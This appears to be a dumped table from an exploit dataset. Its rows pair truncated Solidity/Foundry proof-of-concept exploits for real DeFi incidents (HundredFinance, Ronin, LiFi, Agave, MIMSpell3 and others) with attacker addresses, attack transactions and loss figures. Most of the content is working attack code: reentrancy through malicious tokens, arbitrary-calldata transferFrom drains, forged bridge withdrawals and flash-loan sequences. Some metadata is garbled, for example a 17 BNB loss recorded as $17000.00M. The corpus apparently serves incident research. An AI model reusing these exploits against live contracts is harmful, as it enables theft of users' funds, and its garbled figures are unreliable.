source_code stringlengths 878 31.2k | type stringclasses 1
value | protocol stringlengths 2 33 | date stringclasses 70
values | file_name stringlengths 10 41 | attack_vector stringclasses 4
values | content_hash stringlengths 16 16 | collected_at stringdate 2026-01-07 10:59:16 2026-01-07 10:59:16 | _source stringclasses 1
value | chain stringclasses 8
values | block_number int64 1.11M 356M ⌀ | total_lost_raw stringlengths 3 127 ⌀ | total_lost_usd float64 0 19,026B ⌀ | attacker_address stringlengths 65 82 ⌀ | attack_contract stringlengths 70 89 ⌀ | vulnerable_contract stringlengths 68 82 ⌀ | attack_tx stringlengths 89 115 ⌀ | postmortem_url stringclasses 85
values | twitter_url stringlengths 48 62 ⌀ | has_keyinfo bool 2
classes | has_analysis bool 2
classes | has_attack_vector bool 2
classes | severity stringclasses 4
values | severity_raw stringlengths 3 127 ⌀ | category stringclasses 5
values | exploit_code stringlengths 0 25.5k | has_exploit_code bool 2
classes | keyinfo_total_lost stringlengths 0 127 | keyinfo_attacker stringlengths 0 82 | keyinfo_attack_contract stringlengths 0 89 | keyinfo_vulnerable_contract stringlengths 0 82 | keyinfo_attack_tx stringlengths 0 115 | analysis_postmortem stringclasses 82
values | analysis_twitter stringlengths 0 62 | funds_lost_formatted stringlengths 2 13 | content_richness_score float64 0.63 10 | quality_estimate stringclasses 3
values | title stringlengths 20 51 | has_total_lost bool 2
classes | has_vulnerable_contract bool 2
classes | has_attack_tx bool 2
classes | has_postmortem bool 2
classes |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Root cause: ERC667 tokens hooks reentrancy.
Attacker wallet: 0xd041ad9aae5cf96b21c3ffcb303a0cb80779e358
Attacker contract: 0xdbf225e3d626ec31f502d435b0f72d82b08e1bdd
Attack tx: https://gnosiss... | exploit_poc | HundredFinance | 2022-03 | HundredFinance_exp.sol | flash_loan | 0c20c431200552e2 | 2026-01-07T10:59:16.538667 | postmortems | unknown | 21,120,319 | null | null | null | null | null | https://gnosisscan.io/tx/0x534b84f657883ddc1b66a314e8b392feb35024afdec61dfe8e7c510cfac1a098 | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
borrow();
console.log("Attacker Profit: %s usdc", usdc.balanceOf(address(this)) / 1e6);
} | true | Unknown | 6.56 | medium | HundredFinance Exploit (2022-03) | false | false | true | false | |||||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract EvilToken {
IMasterChef masterchef;
IERC20 usdt = IERC20(0x55d398326f99059fF775485246999027B319... | exploit_poc | Paraluni | 2022-03 | Paraluni_exp.sol | null | 436779daaf731fc4 | 2026-01-07T10:59:16.538726 | postmortems | unknown | 16,008,280 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
token0 = new EvilToken(IMasterChef(address(0)));
token1 = new EvilToken(masterchef);
pair.swap(10_000 * 1e18, 10_000 * 1e18, address(this), new bytes(1));
emit log_named_uint("Before exploit, Dai balance of attacker:", usdt.balanceOf(msg.sender));
... | true | Unknown | 3.85 | low | Paraluni Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
ICErc20Delegate cTUSD = ICErc20Delegate(0x12392F67bdf24faE0AF363c24aC620a2f67DAd86);
IERC20 tusd = IERC20(0x0000000000085d4780B73119b644AE5ecd22b376);
ad... | exploit_poc | CompoundTusd | 2022-03 | CompoundTusd_exp.sol | null | 9c463930ec3c6ca0 | 2026-01-07T10:59:16.538772 | postmortems | unknown | 14,266,479 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExample() public {
emit log_named_uint("Before exploit, Compound TUSD balance:", tusd.balanceOf(address(cTUSD)));
cTUSD.sweepToken(tusdLegacy);
emit log_named_uint("After exploit, Compound TUSD balance:", tusd.balanceOf(address(cTUSD)));
} | true | Unknown | 2.44 | low | CompoundTusd Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
ITreasureMarketplaceBuyer itreasure = ITreasureMarketplaceBuyer(0x812cdA2181ed7c45a35a691E0C85E231D218E273);
IERC721 iSmolBrain = IERC721(0x6325439389E0797Ab... | exploit_poc | TreasureDAO | 2022-03 | TreasureDAO_exp.sol | null | becd624c55818705 | 2026-01-07T10:59:16.538806 | postmortems | unknown | 7,322,694 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
nftOwner = iSmolBrain.ownerOf(tokenId);
emit log_named_address("Original NFT owner of SmolBrain:", nftOwner);
itreasure.buyItem(0x6325439389E0797Ab35752B4F43a14C004f22A9c, 3557, nftOwner, 0, 6_969_000_000_000_000_000_000);
emit log_named_address("Exploit ... | true | Unknown | 2.58 | low | TreasureDAO Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Redacted Cartel Custom Approval Logic Exploit PoC
The vulnerability would have allowed a malicious attacker to assign a user’s allowance to themselves, enabling the attacker to steal that use... | exploit_poc | RedactedCartel | 2022-03 | RedactedCartel_exp.sol | null | 7c13338b2fb17afe | 2026-01-07T10:59:16.538866 | postmortems | unknown | 13,908,185 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
//quick hack to bypass the "onlyAuthorisedOperators" modifier
cheats.prank(owner);
wxBTRFLY.unFreezeToken();
console.log("Before the Exploit !");
console.log("Alice wxBTRFLY Token Balance: ", wxBTRFLY.balanceOf(Alice));
console.log("Bob wx... | true | Unknown | 3.75 | low | RedactedCartel Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IGnosisBridgedAsset is IERC20 {
function mint(address, uint256) external returns (bool);
}
// @KeyInfo - Total Lost : ~1.5M US$
// Attacker : https://gnosisscan.io/address/0x0a16a85... | exploit_poc | Agave | 2022-03 | Agave_exp.sol | flash_loan | f59704de6f414262 | 2026-01-07T10:59:16.538924 | postmortems | unknown | 21,120,283 | ~1.5M US$ | 1,500,000 | https://gnosisscan.io/address/0x0a16a85be44627c10cee75db06b169c7bc76de2c | https://gnosisscan.io/address/0xF98169301B06e906AF7f9b719204AA10D1F160d6 | https://gnosisscan.io/address/0x207E9def17B4bd1045F5Af2C651c081F9FDb0842 | https://gnosisscan.io/tx/0xa262141abcf7c127b88b4042aee8bf601f4f3372c9471dbd75cb54e76524f18e | https://medium.com/agavefinance/agave-exploit-reentrancy-in-liquidation-call-51ae407bc56 | https://twitter.com/Mudit__Gupta/status/1503783633877827586 | true | true | true | critical | ~1.5M US$ | flash-loan | function testExploit() public balanceLog {
//Call prepare and get it setup
_initHF();
_flashWETH();
} | true | ~1.5M US$ | https://gnosisscan.io/address/0x0a16a85be44627c10cee75db06b169c7bc76de2c | https://gnosisscan.io/address/0xF98169301B06e906AF7f9b719204AA10D1F160d6 | https://gnosisscan.io/address/0x207E9def17B4bd1045F5Af2C651c081F9FDb0842 | https://gnosisscan.io/tx/0xa262141abcf7c127b88b4042aee8bf601f4f3372c9471dbd75cb54e76524f18e | https://medium.com/agavefinance/agave-exploit-reentrancy-in-liquidation-call-51ae407bc56 | https://twitter.com/Mudit__Gupta/status/1503783633877827586 | $1.50M | 10 | high | Agave Exploit (2022-03) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IUniswapV2Pair pair = IUniswapV2Pair(0xbC2C5392b0B841832bEC8b9C30747BADdA7b7... | exploit_poc | Revest | 2022-03 | Revest_exp.sol | reentrancy | 46b9e755db3871c6 | 2026-01-07T10:59:16.538997 | postmortems | unknown | 14,465,356 | null | null | null | null | null | null | null | null | false | false | true | medium | null | reentrancy | function testExploit() public {
emit log_named_uint("Before exploit, Rena balance of attacker:", rena.balanceOf(msg.sender));
pair.swap(5 * 1e18, 0, address(this), new bytes(1));
emit log_named_uint("After exploit, Rena balance of attacker:", rena.balanceOf(msg.sender));
} | true | Unknown | 4.33 | low | Revest Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "./../interface.sol";
contract MockACOToken {
function collateral() public view returns (address) {
return address(0);
}
function mintToPayabl... | exploit_poc | Auctus | 2022-03 | Auctus_exp.sol | null | b321d224e7ce60b7 | 2026-01-07T10:59:16.539042 | postmortems | unknown | 14,460,635 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function test() public {
emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
acowrite.write{value: 1}(
address(this),
1,
address(usdc),
abi.encodeWithSelector(
bytes4(keccak256(bytes("transferFrom(a... | true | Unknown | 2.95 | low | Auctus Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IUniswapV2Pair pair = IUniswapV2Pair(0xbcab7d083Cf6a01e0DdA9ed7F8a02b47d125e682);
IERC20 usdc = IERC20(0x04068DA6C83AFCFA0e13ba15A6696662335D5B75);
IOneR... | exploit_poc | OneRing | 2022-03 | OneRing_exp.sol | null | b3464cb31adb7042 | 2026-01-07T10:59:16.539080 | postmortems | unknown | 34,041,499 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
pair.swap(80_000_000 * 1e6, 0, address(this), new bytes(1));
emit log_named_uint("After exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
} | true | Unknown | 2.67 | low | OneRing Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IRoninBridge {
function withdrawERC20For(
uint256 _withdrawalId,
address _user,
... | exploit_poc | Ronin | 2022-03 | Ronin_exp.sol | null | a8e08ce9b320a71b | 2026-01-07T10:59:16.539122 | postmortems | unknown | 14,442,834 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
cheats.startPrank(attacker);
IRoninBridge(roninBridge).withdrawERC20For({ // 0x993e1c42
_withdrawalId: 2_000_000,
_user: attacker,
_token: WETH,
_amount: 173_600_000_000_000_000_000_000,
_signatures: hex"01175db... | true | Unknown | 3.48 | low | Ronin Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface ILIFI {
struct LiFiData {
bytes32 transactionId;
string integrator;
address referrer;
address sendingAssetId;
address receivingAssetId;
... | exploit_poc | LiFi | 2022-03 | LiFi_exp.sol | null | bad2d0a54b823fa2 | 2026-01-07T10:59:16.539308 | postmortems | unknown | 14,420,686 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
cheats.startPrank(from);
// The Vulnerability
// The hack took advantage of our pre-bridge swap feature. Our smart contract allows a caller to pass an array of multiple swaps using any address with arbitrary calldata.
// This design gave us maximum flexi... | true | Unknown | 5 | medium | LiFi Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
... | exploit_poc | Bacon | 2022-03 | Bacon_exp.sol | null | 2fcc0cf7a97058b4 | 2026-01-07T10:59:16.539439 | postmortems | unknown | 14,326,931 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function test() public {
emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
pair.swap(6_360_000_000_000, 0, address(this), new bytes(1));
emit log_named_uint("After exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
} | true | Unknown | 2.98 | low | Bacon Exploit (2022-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 20 WBNB
// Attacker : https://bscscan.com/address/0x3fee6d8aaea76d06cf1ebeaf6b186af215f14088
// Attack Contract : https://bscscan.com/address/0xe82Fc275B0e3573115eaDCa465f85c4F96A6c631
// Vulnerable Co... | exploit_poc | TokenHolder | 2025-10 | TokenHolder_exp.sol | flash_loan | 1b32369ba4da9c6e | 2026-01-07T10:59:16.539480 | postmortems | bsc | null | 20 WBNB | 20 | https://bscscan.com/address/0x3fee6d8aaea76d06cf1ebeaf6b186af215f14088 | https://bscscan.com/address/0xe82Fc275B0e3573115eaDCa465f85c4F96A6c631 | https://bscscan.com/address/0x8c7f34436C0037742AeCf047e06fD4B27Ad01117 | https://bscscan.com/tx/0xc291d70f281dbb6976820fbc4dbb3cfcf56be7bf360f2e823f339af4161f64c6 | null | null | true | true | true | low | 20 WBNB | flash-loan | function testExploit() public balanceLog {
uint256 loadId = 0;
bytes memory sellingCode = abi.encodeWithSignature("privilegedLoan(address,uint256)", WBNB, 20 ether);
address tokenHolder = address(this);
address inchRouter = address(0x2EeD3DC9c5134C056825b12388Ee9Be04E522173);
add... | true | 20 WBNB | https://bscscan.com/address/0x3fee6d8aaea76d06cf1ebeaf6b186af215f14088 | https://bscscan.com/address/0xe82Fc275B0e3573115eaDCa465f85c4F96A6c631 | https://bscscan.com/address/0x8c7f34436C0037742AeCf047e06fD4B27Ad01117 | https://bscscan.com/tx/0xc291d70f281dbb6976820fbc4dbb3cfcf56be7bf360f2e823f339af4161f64c6 | $20 | 8.31 | high | TokenHolder Exploit (2025-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 146,000 USD
// Attacker : https://arbiscan.io/address/0xd356c82e0c85e1568641d084dbdaf76b8df96c08
// Attack Contract : https://arbiscan.io/address/0xd9ff21caeeea4329133c98a... | exploit_poc | SharwaFinance | 2025-10 | SharwaFinance_exp.sol | flash_loan | 3938541aeb219684 | 2026-01-07T10:59:16.539533 | postmortems | arbitrum | null | 146,000 USD | 146 | https://arbiscan.io/address/0xd356c82e0c85e1568641d084dbdaf76b8df96c08 | https://arbiscan.io/address/0xd9ff21caeeea4329133c98a892db16b42f9baa25 | https://arbiscan.io/address/0xd3fde5af30da1f394d6e0d361b552648d0dff797 | null | null | null | true | true | true | low | 146,000 USD | flash-loan | function test_exploit_sequence() public {
emit log_named_uint("WBTC balance before exploit:", IERC20(WBTC).balanceOf(address(attackcontract)));
attackcontract.attackTx1();
vm.roll(BLOCK_TX2 - 1);
attackcontract.attackTx2();
emit log_named_uint("WBTC balance after exploit:", IERC... | true | 146,000 USD | https://arbiscan.io/address/0xd356c82e0c85e1568641d084dbdaf76b8df96c08 | https://arbiscan.io/address/0xd9ff21caeeea4329133c98a892db16b42f9baa25 | https://arbiscan.io/address/0xd3fde5af30da1f394d6e0d361b552648d0dff797 | $146 | 9 | high | SharwaFinance Exploit (2025-10) | true | true | false | false | |||
// SPDX-License-Identifier: UNLICENSED
// @KeyInfo - Total Lost : 1.7M USD
// Attacker : https://etherscan.io/address/0x1aaade3e9062d124b7deb0ed6ddc7055efa7354d
// Attack Contract : https://etherscan.io/address/0xb8e0a4758df2954063ca4ba3d094f2d6eda9b993
// Vulnerable Contract : https://etherscan.io/address/0x46f54d4340... | exploit_poc | MIMSpell3 | 2025-10 | MIMSpell3_exp.sol | null | e9e53884eb1671c4 | 2026-01-07T10:59:16.539619 | postmortems | ethereum | null | 1.7M USD | 1,700,000 | https://etherscan.io/address/0x1aaade3e9062d124b7deb0ed6ddc7055efa7354d | https://etherscan.io/address/0xb8e0a4758df2954063ca4ba3d094f2d6eda9b993 | https://etherscan.io/address/0x46f54d434063e5f1a2b2cc6d9aaa657b1b9ff82c | https://etherscan.io/tx/0x842aae91c89a9e5043e64af34f53dc66daf0f033ad8afbf35ef0c93f99a9e5e6 | null | null | true | true | false | critical | 1.7M USD | unknown | function testExploit() public balanceLog {
_borrowFromAllCauldrons();
_withdrawAllMIMFromBentoBox();
_swapMIMTo3Crv();
_remove3PoolLiquidityToUSDT();
_swapUSDTToWETH();
} | true | 1.7M USD | https://etherscan.io/address/0x1aaade3e9062d124b7deb0ed6ddc7055efa7354d | https://etherscan.io/address/0xb8e0a4758df2954063ca4ba3d094f2d6eda9b993 | https://etherscan.io/address/0x46f54d434063e5f1a2b2cc6d9aaa657b1b9ff82c | https://etherscan.io/tx/0x842aae91c89a9e5043e64af34f53dc66daf0f033ad8afbf35ef0c93f99a9e5e6 | $1.70M | 9 | high | MIMSpell3 Exploit (2025-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~50k $BUSD
// Attacker : https://bscscan.com/address/0x8ccf2860f38fc2f4a56dec897c8c976503fcb123
// Attack Contract : https://bscscan.com/address/0x64b9d294cd918204d1ee6bce283edb49302ddf7e
// Vulnerable Contract : https://bscscan... | exploit_poc | GAX | 2024-07 | GAX_exp.sol | null | 983378ba209954e2 | 2026-01-07T10:59:16.539684 | postmortems | bsc | 40,375,925 | ~50k $BUSD | 50,000 | https://bscscan.com/address/0x8ccf2860f38fc2f4a56dec897c8c976503fcb123 | https://bscscan.com/address/0x64b9d294cd918204d1ee6bce283edb49302ddf7e | https://bscscan.com/address/0xdb4b73df2f6de4afcd3a883efe8b7a4b0763822b | https://bscscan.com/tx/0x368f842e79a10bb163d98353711be58431a7cd06098d6f4b6cbbcd4c77b53108 | null | null | true | false | false | medium | ~50k $BUSD | unknown | function testExploit() public {
emit log_named_decimal_uint("Attacker BUSD balance before attack", BUSD.balanceOf(address(this)), 18);
bytes memory data = abi.encode(0, BUSD.balanceOf(address(VulnContract_addr)), 0);
VulnContract_addr.call(abi.encodeWithSelector(bytes4(0x6c99d7c8), data));
... | true | ~50k $BUSD | https://bscscan.com/address/0x8ccf2860f38fc2f4a56dec897c8c976503fcb123 | https://bscscan.com/address/0x64b9d294cd918204d1ee6bce283edb49302ddf7e | https://bscscan.com/address/0xdb4b73df2f6de4afcd3a883efe8b7a4b0763822b | https://bscscan.com/tx/0x368f842e79a10bb163d98353711be58431a7cd06098d6f4b6cbbcd4c77b53108 | $50.0K | 6.76 | medium | GAX Exploit (2024-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~73K USD
// TX : https://app.blocksec.com/explorer/tx/eth/0x491cf8b2a5753fdbf3096b42e0a16bc109b957dc112d6537b1ed306e483d0744
// Attacker : https://etherscan.io/address/... | exploit_poc | Spectra_finance | 2024-07 | Spectra_finance_exp.sol | null | 552c30fcc1afb22c | 2026-01-07T10:59:16.539724 | postmortems | ethereum | 20,369,956 | ~73K USD | 73,000 | https://etherscan.io/address/0x53635bf7b92b9512f6de0eb7450b26d5d1ad9a4c | https://etherscan.io/address/0xba8ce86147ded54c0879c9a954f9754a472704aa | null | null | null | null | true | false | false | medium | ~73K USD | unknown | function attack() public {
bytes memory datas = abi.encode(
address(asdCRV),
address(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE),
0,
address(this),
1,
abi.encodeWithSelector(
bytes4(0x23b872dd), address(victim), address(this... | true | https://etherscan.io/address/0x53635bf7b92b9512f6de0eb7450b26d5d1ad9a4c | https://etherscan.io/address/0xba8ce86147ded54c0879c9a954f9754a472704aa | $73.0K | 4.99 | low | Spectra_finance Exploit (2024-07) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~200k USD
// TX : https://app.blocksec.com/explorer/tx/eth/0xa245deda8553c6e4c575baff9b50ef35abf4c8f990f8f36897696f896f240e3a
// Frontrunner : https://etherscan.io/addr... | exploit_poc | DeFiPlaza | 2024-07 | DeFiPlaza_exp.sol | flash_loan | e3f2d607d57e4c3c | 2026-01-07T10:59:16.539778 | postmortems | ethereum | 20,240,538 | ~200k USD | 200,000 | https://etherscan.io/address/0x14b362d2e38250604f21a334d71c13e2ed478467 | https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0 | null | null | null | null | true | false | true | high | ~200k USD | flash-loan | false | https://etherscan.io/address/0x14b362d2e38250604f21a334d71c13e2ed478467 | https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0 | $200.0K | 6 | medium | DeFiPlaza Exploit (2024-07) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~10M USD
// TX : https://app.blocksec.com/explorer/tx/eth/0xd82fe84e63b1aa52e1ce540582ee0895ba4a71ec5e7a632a3faa1aff3e763873
// Attacker : https://etherscan.io/address/... | exploit_poc | Lifiprotocol | 2024-07 | Lifiprotocol_exp.sol | flash_loan | 2e2c13c5908678a9 | 2026-01-07T10:59:16.539858 | postmortems | ethereum | 20,318,962 | ~10M USD | 10,000,000 | https://etherscan.io/address/0x8b3cb6bf982798fba233bca56749e22eec42dcf3 | https://etherscan.io/address/0x986aca5f2ca6b120f4361c519d7a49c5ac50c240 | null | null | null | null | true | false | true | critical | ~10M USD | flash-loan | function testExpolit() public {
emit log_named_decimal_uint(
"[Begin] Attacker USDT before exploit", USDT.balanceOf(address(this)), USDT.decimals()
);
attack();
emit log_named_decimal_uint("[End] Attacker USDT after exploit", USDT.balanceOf(address(this)), USDT.decimals());
... | true | https://etherscan.io/address/0x8b3cb6bf982798fba233bca56749e22eec42dcf3 | https://etherscan.io/address/0x986aca5f2ca6b120f4361c519d7a49c5ac50c240 | $10.00M | 7.3 | medium | Lifiprotocol Exploit (2024-07) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~17 BNB
// TX : https://app.blocksec.com/explorer/tx/bsc/0x4353a6d37e95a0844f511f0ea9300ef3081130b24f0cf7a4bd1cae26ec393101
// Attacker : https://bscscan.com/address/0x... | exploit_poc | MRP | 2024-07 | MRP_exp.sol | null | 9659fa096333e9c3 | 2026-01-07T10:59:16.539910 | postmortems | bsc | 40,122,169 | ~17 BNB | 17,000,000,000 | https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138 | https://bscscan.com/address/0x2bd8980a925e6f5a910be8cc0ad1cff663e62d9d | null | null | null | null | true | false | false | critical | ~17 BNB | unknown | function testExploit() public {
emit log_named_decimal_uint("[Begin] Attacker BNB before exploit", address(this).balance, 18);
attack();
emit log_named_decimal_uint("[End] Attacker BNB after exploit", address(this).balance, 18);
} | true | https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138 | https://bscscan.com/address/0x2bd8980a925e6f5a910be8cc0ad1cff663e62d9d | $17000.00M | 5.14 | medium | MRP Exploit (2024-07) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~18K USD
// TX : https://app.blocksec.com/explorer/tx/eth/0x53334c36502bd022bd332f2aa493862fd8f722138d1989132a46efddcc6b04d4
// Attacker : https://etherscan.io/address/... | exploit_poc | MEVbot_0xdd7c | 2024-07 | MEVbot_0xdd7c_exp.sol | flash_loan | 0814e93bba26bd8d | 2026-01-07T10:59:16.539996 | postmortems | ethereum | 20,367,788 | ~18K USD | 18,000 | https://etherscan.io/address/0x98250d30aed204e5cbb8fef7f099bc68dbc4b896 | https://etherscan.io/address/0xe10b2cfa421d0ecd5153c7a9d53dad949e1990dd | null | null | null | null | true | false | true | medium | ~18K USD | flash-loan | function testExpolit() public {
emit log_named_decimal_uint(
"[Begin] Attacker WETH before exploit", WETH.balanceOf(address(this)), WETH.decimals()
);
emit log_named_decimal_uint(
"[Begin] Attacker USDT before exploit", USDT.balanceOf(address(this)), USDT.decimals()
... | true | https://etherscan.io/address/0x98250d30aed204e5cbb8fef7f099bc68dbc4b896 | https://etherscan.io/address/0xe10b2cfa421d0ecd5153c7a9d53dad949e1990dd | $18.0K | 7.65 | medium | MEVbot_0xdd7c Exploit (2024-07) | true | false | false | false | |||||
// This contract is not verified
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~27 ETH
// TX : https://etherscan.io/tx/0x1194e1d6085885ce054a7ff8cd3cd0c3fa308ec87e4ccde8dd0549842fef4f1b
// Attacker : https://etherscan.io/address/0xabee16e74dd268105f166c27a847edc2b8e7cc4e
// Attac... | exploit_poc | UnverifiedContr_0x452E25 | 2024-07 | UnverifiedContr_0x452E25_exp.sol | null | fcf89a6bd607f588 | 2026-01-07T10:59:16.540047 | postmortems | ethereum | 20,223,094 | ~27 ETH | 27 | https://etherscan.io/address/0xabee16e74dd268105f166c27a847edc2b8e7cc4e | https://etherscan.io/address/0x27b27842771df79af6a69795f6fca0948c8333c0 | null | null | null | null | true | false | false | low | ~27 ETH | unknown | function testExploit() public {
bytes memory data = abi.encode(bool(true), address(weth_));
IVictime(victime_).uniswapV3SwapCallback(27_349_000_000_000_000_000, 27_349_000_000_000_000_000, data);
emit log_named_decimal_uint("profit = ", weth_.balanceOf(address(this)), 18);
}
receive() e... | true | ~27 ETH | https://etherscan.io/address/0xabee16e74dd268105f166c27a847edc2b8e7cc4e | https://etherscan.io/address/0x27b27842771df79af6a69795f6fca0948c8333c0 | $27 | 4.62 | low | UnverifiedContr_0x452E25 Exploit (2024-07) | true | false | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~1.81M USD
// TX : https://app.blocksec.com/explorer/tx/eth/0x92cdcc732eebf47200ea56123716e337f6ef7d5ad714a2295794fdc6031ebb2e
// Attacker : https://etherscan.io/address/0x67104175fc5fabbdb5a1876c3914e04b94c71741
// Attack Contr... | exploit_poc | DoughFina | 2024-07 | DoughFina_exp.sol | flash_loan | 710af6252e2ced7e | 2026-01-07T10:59:16.540085 | postmortems | ethereum | 20,288,622 | ~1.81M USD | 1,810,000 | https://etherscan.io/address/0x67104175fc5fabbdb5a1876c3914e04b94c71741 | https://etherscan.io/address/0x11a8dc866c5d03ff06bb74565b6575537b215978 | null | null | null | null | true | false | true | critical | ~1.81M USD | flash-loan | function testExploit() public {
attack();
emit log_named_decimal_uint(
"[End] Attacker WETH balance after exploit", WETH.balanceOf(address(this)), WETH.decimals()
);
} | true | ~1.81M USD | https://etherscan.io/address/0x67104175fc5fabbdb5a1876c3914e04b94c71741 | https://etherscan.io/address/0x11a8dc866c5d03ff06bb74565b6575537b215978 | $1.81M | 6.74 | medium | DoughFina Exploit (2024-07) | true | false | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~427 ETH
// TX : https://app.blocksec.com/explorer/tx/mantle/0xb3c4c313a8d3e2843c9e6e313b199d7339211cdc70c2eca9f4d88b1e155fd6bd
// Attacker : https://mantlescan.info/ad... | exploit_poc | Minterest | 2024-07 | Minterest_exp.sol | flash_loan | 7387a6821bdebc46 | 2026-01-07T10:59:16.540133 | postmortems | unknown | 66,416,576 | ~427 ETH | 427 | https://mantlescan.info/address/0x618f768af6291705eb13e0b2e96600b3851911d1 | https://mantlescan.info/address/0x5fdac50aa48e3e86299a04ad18a68750b2074d2d | null | null | null | null | true | false | true | low | ~427 ETH | flash-loan | function testExpolit() public {
usdy.approve(address(musdy), type(uint256).max);
usdy.approve(address(musd), type(uint256).max);
musd.approve(address(musdy), type(uint256).max);
musdy.approve(address(musdy), type(uint256).max);
address[] memory addressArray = new address[](1);
... | true | https://mantlescan.info/address/0x618f768af6291705eb13e0b2e96600b3851911d1 | https://mantlescan.info/address/0x5fdac50aa48e3e86299a04ad18a68750b2074d2d | $427 | 7.65 | medium | Minterest Exploit (2024-07) | true | false | false | false | |||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~7K USD
// TX : https://app.blocksec.com/explorer/tx/bsc/0x96a955304fed48a8fbfb1396ec7658e7dc42b7c140298b80ce4206df34f40e8d
